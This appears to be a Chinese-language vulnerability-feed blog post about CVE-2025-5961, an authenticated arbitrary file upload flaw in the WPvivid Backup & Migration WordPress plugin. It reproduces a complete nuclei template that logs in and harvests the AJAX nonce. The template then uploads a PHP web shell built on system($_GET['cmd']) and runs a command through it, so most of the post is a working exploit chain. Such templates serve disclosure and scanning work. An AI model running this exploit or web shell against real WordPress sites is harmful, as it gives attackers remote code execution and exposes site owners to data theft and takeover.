Migration, Backup, Staging – WPvivid Backup & Migration Authenticated Arbitrary File Upload Vulnerability

漏洞信息

漏洞名称: Migration, Backup, Staging – WPvivid Backup & Migration Authenticated Arbitrary File Upload Vulnerability

漏洞编号:

  • CVE: CVE-2025-5961

漏洞类型: 文件上传

漏洞等级: 高危

漏洞描述: WPvivid Backup & Migration 是WordPress的一个插件,主要用于网站的迁移、备份和暂存功能。它允许用户轻松备份网站数据并在需要时恢复,广泛应用于需要定期备份或迁移网站的用户中。该插件在WordPress社区中较为流行,因其易用性和功能性受到许多网站管理员的青睐。该插件在0.9.116及之前版本中存在一个认证后的任意文件上传漏洞,这是由于在’wpvivid_upload_import_files’函数中缺少对文件类型的验证。攻击者可以利用此漏洞上传恶意文件到服务器,进而可能导致远程代码执行。此漏洞需要攻击者具有有效的用户凭证,因此属于认证后的漏洞利用。成功利用此漏洞的攻击者可以在服务器上执行任意代码,可能导致网站数据泄露、服务中断或其他恶意活动。由于需要认证,此漏洞的利用门槛相对较高,但一旦被利用,其影响范围广泛且后果严重。

产品厂商: WPvivid

产品名称: WPvivid Backup & Migration

影响版本: <= 0.9.116

来源: https://github.com/projectdiscovery/nuclei-templates/blob/c8374d720258ce040100b3bbef7983427c38c311/http%2Fcves%2F2025%2FCVE-2025-5961.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81

id: CVE-2025-5961

info:
  name: Migration, Backup, Staging – WPvivid Backup & Migration <= 0.9.116  - Authenticated Arbitrary File Upload
  author: pussycat0x
  severity: high
  description: |
    The Migration, Backup, Staging – WPvivid Backup & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'wpvivid_upload_import_files' function in all versions up to, and including, 0.9.116
  reference:
    - https://github.com/Nxploited/CVE-2025-5961
  tags: cve,cve2025,wordpress,intrusive,wpvivid,plugin,unauth,backup

variables:
  payload: '<?php echo "<br>"; if(isset($_GET["cmd"])){ echo "<pre>"; system($_GET["cmd"]); echo "</pre>"; } ?>'
  cmd: 'id'

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin.php?page=wpvivid-export-import HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate, br
        Accept: */*
        Connection: keep-alive
        Content-Length: 598
        Content-Type: multipart/form-data; boundary=0b9e4b9be0f532af74af1582b95632f2

        --0b9e4b9be0f532af74af1582b95632f2
        Content-Disposition: form-data; name="action"

        wpvivid_upload_import_files
        --0b9e4b9be0f532af74af1582b95632f2
        Content-Disposition: form-data; name="_ajax_nonce"

        {{ajax_nonce}}
        --0b9e4b9be0f532af74af1582b95632f2
        Content-Disposition: form-data; name="async-upload"; filename="{{randstr}}.php"
        Content-Type: application/x-php

        {{payload}}
        --0b9e4b9be0f532af74af1582b95632f2
        Content-Disposition: form-data; name="name"

        {{randstr}}.php
        --0b9e4b9be0f532af74af1582b95632f2--

      - |
        GET wp-content/wpvividbackups/ImportandExport/{{randstr}}.php?cmd={{cmd}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains(body_3, "{\"result\":\"success\"}")
          - regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body_4)
          - status_code_2 == 200 && status_code_3 == 200 && status_code_4 == 200
        condition: and

    extractors:
      - type: regex
        part: body_2
        group: 1
        internal: true
        name: ajax_nonce
        regex:
          - '"ajax_nonce":"([a-f0-9]+)"'



Github Poc
#projectdiscovery/nuclei-templates:github issues #文件上传
Migration, Backup, Staging – WPvivid Backup & Migration Authenticated Arbitrary File Upload Vulnerability
http://example.com/2025/07/17/github_1409615820/
作者
lianccc
发布于
2025年7月17日
许可协议